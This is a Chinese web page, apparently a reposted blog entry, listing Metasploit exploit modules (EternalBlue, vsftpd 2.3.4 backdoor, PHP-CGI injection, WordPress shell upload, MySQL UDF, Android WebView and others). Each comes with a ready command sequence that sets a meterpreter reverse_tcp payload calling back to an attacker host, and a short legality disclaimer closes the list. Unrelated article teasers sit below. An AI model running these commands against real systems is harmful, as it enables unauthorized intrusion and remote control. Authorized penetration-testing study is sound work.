metasploit/modules/exploits 有哪些模块,以及具体使用案例

Metasploit框架的exploits模块用于利用已知漏洞执行代码,通常用于获取远程控制或执行特定任务。以下是一些常见的exploits模块及其使用案例:

1. Windows漏洞利用

  • exploit/windows/smb/ms17_010_eternalblue:利用SMBv1漏洞(永恒之蓝)。

    use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

  • exploit/windows/local/ms16_032_secondary_logon_handle_privesc:利用Windows权限提升漏洞。

    use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

2. Linux漏洞利用

  • exploit/unix/ftp/vsftpd_234_backdoor:利用vsftpd 2.3.4后门漏洞。

    use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.1
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

  • exploit/unix/webapp/php_cgi_arg_injection:利用PHP-CGI参数注入漏洞。

    use exploit/unix/webapp/php_cgi_arg_injection
set RHOSTS 192.168.1.1
set RPORT 80
set TARGETURI /vulnerable.php
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

3. Web应用漏洞利用

  • exploit/multi/http/wp_admin_shell_upload:利用WordPress管理员后台上传shell漏洞。

    use exploit/multi/http/wp_admin_shell_upload
set RHOSTS 192.168.1.1
set TARGETURI /wordpress
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

  • exploit/multi/http/wordpress_file_upload:利用WordPress文件上传漏洞。

    use exploit/multi/http/wordpress_file_upload
set RHOSTS 192.168.1.1
set TARGETURI /wordpress
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

4. 数据库漏洞利用

  • exploit/unix/mysql/mysql_udf_payload:利用MySQL UDF(用户定义函数)漏洞。
    use exploit/unix/mysql/mysql_udf_payload
set RHOSTS 192.168.1.1
set RPORT 3306
set USER dbuser
set PASS dbpass
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

5. 其他

  • exploit/android/browser/webview_addjavascriptinterface:利用Android WebView AddJavascriptInterface漏洞。
    use exploit/android/browser/webview_addjavascriptinterface
set RHOSTS 192.168.1.1
set RPORT 8080
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 4444
run

注意事项

  • 使用这些模块时,请确保你有合法的权限和目的。
  • 避免在未经授权的系统上进行测试,以免违反法律或政策。

通过这些模块和案例,你可以利用已知漏洞执行代码,从而获取远程控制或执行特定任务。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/57573.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【深度学习】Bert下载和使用(以bert-base-uncased为例)

【深度学习】Bert下载和使用(以bert-base-uncased为例)

【深度学习】Bert下载和使用(以bert-base-uncased为例) 代码报错报错原因解决方法解决步骤1.进入Hugging Face,检索bert-base-uncased2.点击Files and versions3.下载文件4.下载的文件放入文件夹5.代码修改 代码报错 bert BertModel.from_p…
阅读更多...
JupyterLab,极其强大的下一代notebook!

JupyterLab,极其强大的下一代notebook!

JupyterLab简介 JupyterLab是Jupyter主打的最新数据科学生产工具,某种意义上,它的出现是为了取代Jupyter Notebook。不过不用担心Jupyter Notebook会消失,JupyterLab包含了Jupyter Notebook所有功能。 JupyterLab作为一种基于web的集成开发环…
阅读更多...
MS01SF1 精准测距UWB模组助力露天采矿中的人车定位安全和作业效率提升

MS01SF1 精准测距UWB模组助力露天采矿中的人车定位安全和作业效率提升

在当今矿业行业,随着全球对资源需求的不断增加和开采难度的逐步提升,传统的作业方式面临着越来越多的挑战。露天矿山开采,因其大规模的作业环境和复杂的地形特点,面临着作业人员的安全风险、设备调度的高难度以及资源利用率低下等…
阅读更多...
使用 Github 进行项目管理

使用 Github 进行项目管理

GitHub 是一个广泛使用的代码托管和协作平台,它提供了强大的工具来支持项目管理和团队协作。在项目开发和工作中,避免不了 Github 的使用,然鹅我一直没有稍微系统地学习过 github 的整个工作流程,对这些操作都是一知半解的&#x…
阅读更多...
servlet开发

servlet开发

一、Servelet (一)Servelet概述 1.概念:Severlet是一门动态web资源开发技术。 2.本质:Severlet本质是一段Java程序,但和Java程序不同的是,Severlet程序无法独立运行,需要放服务器中&#xff…
阅读更多...
ArcGIS003:ArcMap常用操作0-50例动图演示

ArcGIS003:ArcMap常用操作0-50例动图演示

摘要:本文以动图形式介绍了ArcMap软件的基本操作,包括快捷方式创建、管理许可服务、操作界面元素(如内容列表、目录树、搜索窗口、工具箱、Python窗口、模型构建器窗口等)的打开与关闭、位置调整及合并,设置默认工作目…
阅读更多...
链表|反转链表|移除链表元素|链表的中间节点|返回倒数第k个节点|合并两个有序链表(C)

链表|反转链表|移除链表元素|链表的中间节点|返回倒数第k个节点|合并两个有序链表(C)

206. 反转链表 用两个指针 p1指向空,p2指向第一个节点 p2的next指向p1,把方向调过来 因为p2的next指向p1,会丢掉后面的节点,所以需要三个节点 前两个指针是为了反转,后一个指针是为了找到下一个节点 p2给给p1&a…
阅读更多...
计算机毕业设计——ssm基于java智能选课系统的设计与实现演示录像2021

计算机毕业设计——ssm基于java智能选课系统的设计与实现演示录像2021

作者:程序媛9688开发技术:SpringBoot、SSM、Vue、MySQL、JSP、ElementUI、Python、小程序等。 🌟文末获取源码数据库🌟感兴趣的可以先收藏起来,还有大家在毕设选题(免费咨询指导选题)&#xff0…
阅读更多...
GitGraphPro 图管理系统

GitGraphPro 图管理系统

1.产品介绍 产品介绍方案 产品名称: GitGraphPro 图管理系统 主要功能: 智能图谱构建版本控制与协作数据分析与可视化自定义模板与导出功能介绍: 1. 智能图谱构建 具体作用:GitGraphPro 利用先进的算法,自动从项目数据
阅读更多...
一:时序数据库-Influx应用

一:时序数据库-Influx应用

目录 0、版本号 1、登录页面 2、账号基本信息 3、数据库案例 4、可视化 5、java案例 0、版本号 InfluxDB v2.4.0 1、登录页面 http://127.0.0.1:8086/signin 账号:自己账号 密码:自己密码 2、账号基本信息 查看用户id和组织id!&…
阅读更多...
python脚本:十六进制数据小端序转大端序

python脚本:十六进制数据小端序转大端序

大多数机器的存储方式都是小端排序,小端序指的是数据的高位(偏左边的)放在内存中的高地址(偏右边的)处,这样会导致存放好的数据对于我们看来好像是“倒过来”的 大端序则是我们看上去从左到右的正常排序 例…
阅读更多...
华为云Stack名词解释

华为云Stack名词解释

1、MRS MapReduce服务(MRS)是一种基于云计算平台的即开即用、稳定可靠、弹性伸缩、便捷管理的数据处理分析服务。 2、VBS 云硬盘备份服务(VBS,Volume Backup Service)可为云硬盘(EVS,Elastic…
阅读更多...
企业SRC挖掘选择与信息收集指南

企业SRC挖掘选择与信息收集指南

内容预览 ≧∀≦ゞ 企业SRC挖掘选择与信息收集指南导语1. 企业SRC的选择2. 信息收集2.1 集团与子公司2.2 小程序与APP2.3 Web端信息收集 3. 信息收集常用模板总结 企业SRC挖掘选择与信息收集指南 导语 近年来,企业的安全响应中心(SRC)已逐渐…
阅读更多...
详细分析SQL state [99999]; error code [17059]; 无法转换为内部表示 解决方法(实战讲解)

详细分析SQL state [99999]; error code [17059]; 无法转换为内部表示 解决方法(实战讲解)

目录 1. 问题所示2. 问题所示3. 解决方法1. 问题所示 执行代码的事后,出现如下问题: Error attempting to get column ID from result set. Cause: java.sql.SQLException: 无法转换为内部表示 ; uncategorized SQLException; SQL state [99999]<
阅读更多...
流场主动流动控制

流场主动流动控制

对于流场的主动控制而言&#xff0c;其难点主要集中在强化学习的环境搭建过程&#xff0c;如何建立数值仿真与强化学习的信息交互是研究过程中的拦路虎。经过几个星期的研究&#xff0c;已基本实现由pycharm程序数据端向star ccm端的数据传递。其主要过程包括如下过程&#xff…
阅读更多...
Django-文件上传

Django-文件上传

定义&#xff1a; 上传规则-前端【html】&#xff1a; 上传规则-后端【Django】&#xff1a; urlpatterns [path(upload,views.test_upload) ] 例子&#xff1a; settings添加: MEDIA_URL /media/ MEDIA_ROOT os.path.join(BASE_DIR, media) 主路由&#xff1a; urlpa…
阅读更多...
kafka-console-ui的简介及安装使用

kafka-console-ui的简介及安装使用

kafka-console-ui的简介及安装使用 一、kafka-console-ui的简介二、安装kafka-console-ui2.1 源码安装2.2 docker安装 三、kafka-console-ui功能使用3.1、功能特性3.2、 功能介绍3.2.1 集群3.2.2 topic3.2.3 消费组3.2.4 Acl3.2.5 运维 一、kafka-console-ui的简介 kafka-cons…
阅读更多...
ONLYOFFICE 8.2 版本产品评测——遥遥领先

ONLYOFFICE 8.2 版本产品评测——遥遥领先

知孤云出岫-CSDN博客 目录 产品介绍——篇【1】 一.关于 ONLYOFFICE 桌面编辑器 二.关于 ONLYOFFICE 协作空间 三.关于 ONLYOFFICE 文档 四.关于 ONLYOFFICE的版本介绍 产品新功能——篇【2】 一.关于 ONLYOFFICE的新增功能介绍 二.OLE FICE文档概述 三.PDF编辑器更新 …
阅读更多...
星河飞雪网络安全学习笔记-shodan使用7(完结)

星河飞雪网络安全学习笔记-shodan使用7(完结)

学习笔记-shodan使用7 Shodan命令 info shodan info查询账户搜索次数。 Domain shodan domain baidu.com查询ip域名信息 Scan shodan scan submit ip对ip进行实时扫描&#xff0c;类似nmap。 shodan scan list显示扫描信息。 Stats shodan stats --facets ssl.version countr…
阅读更多...
【原创分享】详述中间件的前世今生

【原创分享】详述中间件的前世今生

中间件是一种软件组件&#xff0c;位于应用程序和操作系统之间&#xff0c;通过提供统一的接口和功能来简化开发和管理应用程序、提高应用程序的可靠性和性能。 中间件的前世可以追溯到20世纪80年代的分布式系统和网络技术的发展。在那个时候&#xff0c;随着计算机网络的普及…
阅读更多...
最新文章

Copyright @ 2022~2023